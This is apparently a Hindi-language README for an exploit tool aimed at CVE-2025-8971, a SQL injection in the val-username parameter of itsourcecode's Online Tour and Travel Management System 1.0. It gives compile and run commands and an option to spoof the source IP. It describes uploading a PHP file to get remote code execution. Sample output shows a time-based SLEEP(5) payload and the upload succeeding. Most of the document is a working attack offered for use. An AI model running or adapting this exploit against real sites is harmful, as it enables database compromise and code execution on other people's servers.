
itsourcecode के ऑनलाइन टूर और ट्रैवल मैनेजमेंट सिस्टम 1.0 में SQL इंजेक्शन
लेखक: Byte Reaper
यह एक्सप्लॉइट CVE-2025-8971 के लिए है, जो itsourcecode ऑनलाइन टूर और ट्रैवल मैनेजमेंट सिस्टम 1.0 में एक SQL इंजेक्शन भेद्यता है। यह भेद्यता /admin/operations/travellers.php में मौजूद है और इसे val-username पैरामीटर के माध्यम से दूर से शोषित किया जा सकता है।
यह कैसे काम करता है
एक्सप्लॉइट लक्ष्य URL पर तैयार HTTP POST अनुरोध भेजता है।
पेलोड को एन्कोड करके val-username में इंजेक्ट किया जाता है।
वैकल्पिक फ़ाइल अपलोड (.php या छवि) का उपयोग करके दूरस्थ कोड निष्पादन प्राप्त किया जा सकता है।
स्क्रिप्ट यह सत्यापित करने के लिए प्रतिक्रियाओं की जाँच करता है कि पेलोड सफलतापूर्वक निष्पादित हुआ या नहीं।
GCC कंपाइलर (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help सहायता संदेश
-u, --url लक्ष्य URL (बेस URL)
-c, --cookies फ़ाइल कुकीज़
-i, --ip नकली IP (होस्ट अनुरोध)
-f, --file फ़ाइल अपलोड (.php / छवि)
-v, --verbose वर्बोज़ मोड
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
MIT लाइसेंस